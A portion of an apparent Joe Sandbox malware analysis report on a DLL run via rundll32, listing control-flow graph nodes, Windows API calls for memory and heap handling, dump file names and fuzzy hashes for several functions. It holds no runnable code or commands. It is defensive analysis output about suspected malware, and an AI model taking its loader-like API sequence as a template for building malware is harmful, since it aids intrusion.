                                                                                                                                    control_flow_graph 36 10002280-100022a7 call 10001990 39 100022b0-100022c1 36->39 40 100022a9-100022ab 36->40 42 100022c3-100022d0 SetLastError 39->42 43 100022d5-100022f0 call 10001990 39->43 41 1000269a-1000269d 40->41 42->41 46 100022f2-100022f4 43->46 47 100022f9-1000230e 43->47 46->41 48 10002310-1000231d SetLastError 47->48 49 10002322-1000232f 47->49 48->41 50 10002331-1000233e SetLastError 49->50 51 10002343-1000234c 49->51 50->41 52 10002360-10002381 51->52 53 1000234e-1000235b SetLastError 51->53 54 10002395-1000239f 52->54 53->41 55 100023a1-100023a8 54->55 56 100023d7-10002412 GetNativeSystemInfo 54->56 57 100023b8-100023c4 55->57 58 100023aa-100023b6 55->58 59 10002414-10002421 SetLastError 56->59 60 10002426-10002445 VirtualAlloc 56->60 61 100023c7-100023cd 57->61 58->61 59->41 62 10002472-1000248a GetProcessHeap HeapAlloc 60->62 63 10002447-10002461 VirtualAlloc 60->63 64 100023d5 61->64 65 100023cf-100023d2 61->65 67 100024ac-10002510 call 10001990 62->67 68 1000248c-100024a7 VirtualFree SetLastError 62->68 63->62 66 10002463-1000246d SetLastError 63->66 64->54 65->64 66->41 72 10002512 67->72 73 1000251c-10002581 VirtualAlloc call 10001810 call 100019c0 67->73 68->41 74 1000268c-10002698 call 10002840 72->74 81 10002583 73->81 82 1000258d-1000259e 73->82 74->41 81->74 83 100025a0-100025b6 call 10001eb0 82->83 84 100025b8-100025bb 82->84 86 100025c2-100025d0 call 10001ff0 83->86 84->86 90 100025d2 86->90 91 100025dc-100025ea call 10001cb0 86->91 90->74 94 100025f6-10002604 call 10001e30 91->94 95 100025ec 91->95 98 10002606 94->98 99 1000260d-10002616 94->99 95->74 98->74 100 10002618-1000261f 99->100 101 1000267d-10002680 99->101 103 10002621-10002643 call 26e991 100->103 104 1000266a-10002678 100->104 102 10002687-1000268a 101->102 102->41 106 10002646-1000264d 103->106 105 1000267b 104->105 105->102 107 1000265e-10002668 106->107 108 1000264f-1000265a SetLastError 106->108 107->105 108->74
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 10001990: SetLastError.KERNEL32(0000000D,?,?,100022A5,10012839,00000040), ref: 100019A1
                                                                                                                                    • SetLastError.KERNEL32(000000C1,10012839,00000040), ref: 100022C8
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.527063809.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 0000000B.00000002.527057151.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                    • Associated: 0000000B.00000002.527138701.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                    • Associated: 0000000B.00000002.527165862.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                    • Associated: 0000000B.00000002.527177916.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                    • Associated: 0000000B.00000002.527189497.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorLast
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1452528299-0
                                                                                                                                    • Opcode ID: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                                    • Instruction ID: 346a8eef4056a92d897d0963d9e5b5a8ca828aef95f805bf3d5880fe5d8ad0e4
                                                                                                                                    • Opcode Fuzzy Hash: 0e09b11d72102b2f53da7248ccc42e4e27664b89a2cf1ce4a90d5e07d10becff
                                                                                                                                    • Instruction Fuzzy Hash: 18E14974A00209DFEB48CF94C990AAEB7F6FF88340F208559E905AB359DB75AD42CF50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10006A90 Relevance: 18.4, APIs: 1, Instructions: 16933COMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 110 10006a90-10006aab call 1002f9a6 113 10006ab7-10012570 110->113 114 10006aad-10006ab2 110->114 116 10012584-1001258b 113->116 115 100125b4-100125b8 114->115 117 10012597-1001259b call 1002fa69 116->117 118 1001258d-10012595 116->118 121 100125a0-100125a9 117->121 118->116 122 100125ab-100125ad 121->122 123 100125af 121->123 122->115 123->115
                                                                                                                                    APIs
                                                                                                                                    • _malloc.LIBCMT ref: 10006A9C
                                                                                                                                      • Part of subcall function 1002F9A6: __FF_MSGBANNER.LIBCMT ref: 1002F9C9
                                                                                                                                      • Part of subcall function 1002F9A6: __NMSG_WRITE.LIBCMT ref: 1002F9D0
                                                                                                                                      • Part of subcall function 1002F9A6: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001), ref: 1002FA1E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.527063809.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 0000000B.00000002.527057151.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                    • Associated: 0000000B.00000002.527138701.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                    • Associated: 0000000B.00000002.527165862.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                    • Associated: 0000000B.00000002.527177916.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                    • Associated: 0000000B.00000002.527189497.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocateHeap_malloc
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 501242067-0
                                                                                                                                    • Opcode ID: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                                    • Instruction ID: 7622b3071c216813c8acba396ad13572c3e9674cac4916c3917d4934f1ce5c91
                                                                                                                                    • Opcode Fuzzy Hash: ab67eba576b62ed2242e6049fa4a9f00a0283ae289beaf397465af8560d1c9fc
                                                                                                                                    • Instruction Fuzzy Hash: BF844072D0002ECFCF08DFECCA959EEFBB5FF68204B169259D425BB294C6356A11CA54
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1002083B Relevance: 16.6, APIs: 11, Instructions: 103memoryCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • EnterCriticalSection.KERNEL32(100575E0,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 1002084A
                                                                                                                                    • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 100208A0
                                                                                                                                    • GlobalHandle.KERNEL32(00487B00), ref: 100208A9
                                                                                                                                    • GlobalUnlock.KERNEL32(00000000,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208B2
                                                                                                                                    • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 100208C9
                                                                                                                                    • GlobalHandle.KERNEL32(00487B00), ref: 100208DB
                                                                                                                                    • GlobalLock.KERNEL32 ref: 100208E2
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?,?,?,?,?,100575C4,10020C7A,00000004,1001FA0B,10015B30,1001555B,?,10015D3C,00000004,10015139,00000004), ref: 100208EC
                                                                                                                                    • GlobalLock.KERNEL32 ref: 100208F8
                                                                                                                                    • _memset.LIBCMT ref: 10020911
                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 1002093D
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.527063809.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 0000000B.00000002.527057151.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                    • Associated: 0000000B.00000002.527138701.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                    • Associated: 0000000B.00000002.527165862.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                    • Associated: 0000000B.00000002.527177916.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                    • Associated: 0000000B.00000002.527189497.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 496899490-0
                                                                                                                                    • Opcode ID: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                                    • Instruction ID: dc14c853345dee55639cdae2a1fd03b11c2696e398e705256622f09b1856cd91
                                                                                                                                    • Opcode Fuzzy Hash: 23a5f943a2514d5899e1dc1f035ea6f74369b98ac7016ed06c6f01df95d95d17
                                                                                                                                    • Instruction Fuzzy Hash: 08319C75600715AFE324CF24DD88A1AB7EAEB49241B01492AF996C3662EB71F8448B50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1002FA69 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • __lock.LIBCMT ref: 1002FA87
                                                                                                                                      • Part of subcall function 10035A99: __mtinitlocknum.LIBCMT ref: 10035AAD
                                                                                                                                      • Part of subcall function 10035A99: __amsg_exit.LIBCMT ref: 10035AB9
                                                                                                                                      • Part of subcall function 10035A99: EnterCriticalSection.KERNEL32(00000001,00000001,?,10035387,0000000D,10050C60,00000008,10035479,00000001,?,?,00000001,?,?,10030C69,00000001), ref: 10035AC1
                                                                                                                                    • ___sbh_find_block.LIBCMT ref: 1002FA92
                                                                                                                                    • ___sbh_free_block.LIBCMT ref: 1002FAA1
                                                                                                                                    • HeapFree.KERNEL32(00000000,?,10050988), ref: 1002FAD1
                                                                                                                                    • GetLastError.KERNEL32(?,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 1002FAE2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.527063809.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 0000000B.00000002.527057151.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                    • Associated: 0000000B.00000002.527138701.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                    • Associated: 0000000B.00000002.527165862.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                    • Associated: 0000000B.00000002.527177916.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                    • Associated: 0000000B.00000002.527189497.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2714421763-0
                                                                                                                                    • Opcode ID: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                                    • Instruction ID: c59143bfe651e608972d8f734a12067a167937505bca417355bd9d82aad263b9
                                                                                                                                    • Opcode Fuzzy Hash: dc462893557a6a2c1efb59ab9fc79b5cbceadcecec0e23dee2ff352f2dee75c2
                                                                                                                                    • Instruction Fuzzy Hash: 3D012BB5904316AEEB11DFB0EC05B9D7BB4EF013D2F50412DF008AE091DB35A840DB92
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10036624 Relevance: 3.0, APIs: 2, Instructions: 28memoryCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 235 10036624-10036642 HeapCreate 236 10036647-10036654 call 100365c9 235->236 237 10036644-10036646 235->237 240 10036656-10036663 call 10035aca 236->240 241 1003667a-1003667d 236->241 240->241 244 10036665-10036678 HeapDestroy 240->244 244->237
                                                                                                                                    APIs
                                                                                                                                    • HeapCreate.KERNELBASE(00000000,00001000,00000000,10030AEB,00000001,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10036635
                                                                                                                                    • HeapDestroy.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003666B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.527063809.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 0000000B.00000002.527057151.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                    • Associated: 0000000B.00000002.527138701.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                    • Associated: 0000000B.00000002.527165862.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                    • Associated: 0000000B.00000002.527177916.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                    • Associated: 0000000B.00000002.527189497.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Heap$CreateDestroy
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3296620671-0
                                                                                                                                    • Opcode ID: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                                    • Instruction ID: 5adf962be877c1470e25a5b203e63be93066c2f5666ac54c72bc9e0dfe65a95a
                                                                                                                                    • Opcode Fuzzy Hash: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                                    • Instruction Fuzzy Hash: 22E06D706103519EFB139B30CE8A33539F8FB5878BF008869F405C80A0FBA08840AA15
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 100019C0 Relevance: 2.6, APIs: 2, Instructions: 115memoryCOMMONLIBRARYCODE
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 245 100019c0-100019ee 246 10001a02-10001a0e 245->246 247 10001a14-10001a1b 246->247 248 10001b06 246->248 249 10001a83-10001a9e call 10001990 247->249 250 10001a1d-10001a2a 247->250 251 10001b0b-10001b0e 248->251 259 10001aa0-10001aa2 249->259 260 10001aa4-10001ac9 VirtualAlloc 249->260 253 10001a2c-10001a4e VirtualAlloc 250->253 254 10001a7e 250->254 257 10001a50-10001a52 253->257 258 10001a57-10001a7b call 100017c0 253->258 254->246 257->251 258->254 259->251 262 10001acb-10001acd 260->262 263 10001acf-10001afe call 10001810 260->263 262->251 263->248
                                                                                                                                    APIs
                                                                                                                                    • VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000257F,00000000), ref: 10001A41
                                                                                                                                    • VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,10012839,8B118BBC,?,1000257F,00000000,10012839,?), ref: 10001ABC
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.527063809.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 0000000B.00000002.527057151.0000000010000000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                    • Associated: 0000000B.00000002.527138701.0000000010046000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                    • Associated: 0000000B.00000002.527165862.0000000010053000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                    • Associated: 0000000B.00000002.527177916.0000000010057000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                    • Associated: 0000000B.00000002.527189497.000000001005A000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                    • Opcode ID: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                                    • Instruction ID: bcee95509f27266f5ca249dd7f6d6a0ca5035efccc592cd1fda7edfbe35d51d4
                                                                                                                                    • Opcode Fuzzy Hash: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                                    • Instruction Fuzzy Hash: 0D51D9B4A0010AEFDB04CF94C991AAEB7F5FF48344F248599E905AB345D770EE91CBA1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%